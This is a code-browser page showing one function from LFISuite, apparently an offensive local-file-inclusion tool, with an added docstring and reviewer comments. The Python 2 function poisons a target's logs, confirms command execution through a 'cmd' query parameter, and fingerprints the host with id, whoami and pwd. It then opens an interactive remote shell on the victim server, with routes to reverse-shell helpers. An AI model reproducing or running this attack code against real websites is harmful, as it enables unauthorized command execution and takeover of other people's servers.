hub / github.com/D35m0nd142/LFISuite / GetPassthru

Function GetPassthru

lfisuite.py:1079–1136  ·  view source on GitHub ↗
(ologurl, logmain)

Source from the content-addressed store, hash-verified

1077 return passthru_ext(resp,start_get)
1078
def GetPassthru(ologurl, logmain):
    """Probe ``ologurl`` for command execution through a ``cmd`` query
    parameter and, if the probe succeeds, run an interactive command loop.

    The probe is differential: ``ologurl&cmd=echo <marker>`` is fetched once
    before and once after ``send_passthru_req(logmain)``, and the number of
    ``"GET /<marker>"`` occurrences in the two responses is compared. Only an
    increase is treated as a positive result.

    Args:
        ologurl: Base URL; ``&cmd=...`` is appended to it verbatim, so it is
            expected to already carry a query string.
        logmain: Passed to ``send_passthru_req`` and shown as the host part
            of the interactive prompt.

    Returns:
        None. Returns early when the marker never appears in the second
        response. After the interactive loop ends the process is terminated
        with ``exit()``.

    Side effects:
        May set the module-level ``victimOs`` to ``"Windows"``.

    NOTE(review): this is Python 2 code (``print`` statements, ``raw_input``).
    The listing it was taken from had lost its indentation, so the nesting
    below is reconstructed -- in particular the placement of ``print ""`` and
    ``exit()`` should be confirmed against the upstream file.
    """
    global victimOs

    print colored("\nTrying to inject the website using GET 'passthru' requests.", "white")
    # Random marker: lets the probe tell its own output apart from anything
    # already present in the response.
    rand_str = generateRandom()
    # Seen from the server side, this probe is two GETs to the same URL whose
    # query string ends in "cmd=echo <marker>".
    url = "%s&cmd=echo %s" %(ologurl,rand_str)
    # verify=False turns off TLS certificate validation for this request.
    resp = (requests.get(url,headers=gen_headers,timeout=20, verify=False)).text
    # Baseline count of the marker pattern before send_passthru_req runs.
    vuln_count_before = len(SubstrFind(resp,"GET /%s" %rand_str))

    # send_passthru_req is defined elsewhere in the file; the only effect this
    # function relies on is that the marker count rises afterwards.
    send_passthru_req(logmain)
    r = requests.get(url,headers=gen_headers,timeout=20, verify=False)
    resp = r.text
    vulns = SubstrFind(resp,"GET /%s" %rand_str)
    vuln_count_after = len(vulns)

    try:
        # Last hit; it is used below as a slice bound on resp, so SubstrFind
        # presumably returns offsets into the text -- confirm.
        start = vulns[len(vulns)-1]
    except:
        # NOTE(review): the expected failure is IndexError on an empty result,
        # but a bare except also swallows KeyboardInterrupt and SystemExit.
        return

    if(vuln_count_after > vuln_count_before):
        print "\n[+] The website seems to be vulnerable. Opening a System Shell..\n"
        # Keep only the text before the last marker hit and count the
        # "GET /" occurrences in it; that count plus one is handed to
        # send_passthru_cmd, whose interpretation of it is not shown here.
        resp = resp[:start]
        got = SubstrFind(resp,"GET /")
        start_get = len(got)+1

        # Fixed fingerprinting commands are issued in this order: "id", then
        # "path" only if the "id" output looks wrong, then "whoami", then
        # "cd" or "pwd". How they appear on the wire depends on
        # send_passthru_cmd, which is defined elsewhere.
        uid = cleanOutput(send_passthru_cmd(ologurl,"id",start_get),True)
        if("uid=" not in uid and "Usage of id by " not in uid):
            # check if Windows operating system
            path = cleanOutput(send_passthru_cmd(ologurl,"path",start_get),True)
            if(checkIfWindows(path)):
                victimOs = "Windows"

        whoami = isUnknown(cleanOutput(send_passthru_cmd(ologurl,"whoami",start_get),True))
        pwd = ""

        # "cd" is sent on Windows and "pwd" otherwise to obtain the working
        # directory shown in the prompt.
        if(victimOs == "Windows"):
            pwd = cleanOutput(send_passthru_cmd(ologurl,"cd",start_get),True)
        else:
            pwd = cleanOutput(send_passthru_cmd(ologurl,"pwd",start_get),True)

        shell = "%s@%s:%s$ " %(whoami, logmain, pwd)
        # NOTE(review): str.replace returns a new string and the result is
        # discarded here, so this line leaves the prompt unchanged.
        shell.replace(' ','')

        cmd = ""
        # Read commands until the operator types "exit" or "quit".
        while(cmd != "exit" and cmd != "quit"):
            cmd = raw_input("%s" %shell)
            # Single quotes in the typed command are rewritten to double
            # quotes before sending; presumably this protects the quoting
            # used by send_passthru_cmd -- confirm.
            cmd = cmd.replace("'","\"")
            if(cmd != "exit" and cmd != "quit"):
                # Input recognised by checkIfReverseShell is routed to an
                # OS-specific helper instead of being sent as a command.
                if(checkIfReverseShell(cmd)):
                    if(victimOs != "Windows"):
                        passthru_reverse_shell(ologurl,start_get)
                    else:
                        windows_passthru_reverse_shell(ologurl,start_get)
                else:
                    print cleanOutput(send_passthru_cmd(ologurl,cmd,start_get),False)
                    print ""
        # Ends the whole process, not just this function, once the loop exits.
        exit()

Callers 1

run_access_logFunction · 0.85

Calls 11

generateRandomFunction · 0.85
SubstrFindFunction · 0.85
send_passthru_reqFunction · 0.85
cleanOutputFunction · 0.85
send_passthru_cmdFunction · 0.85
checkIfWindowsFunction · 0.85
isUnknownFunction · 0.85
checkIfReverseShellFunction · 0.85
passthru_reverse_shellFunction · 0.85
exitFunction · 0.85

Tested by

no test coverage detected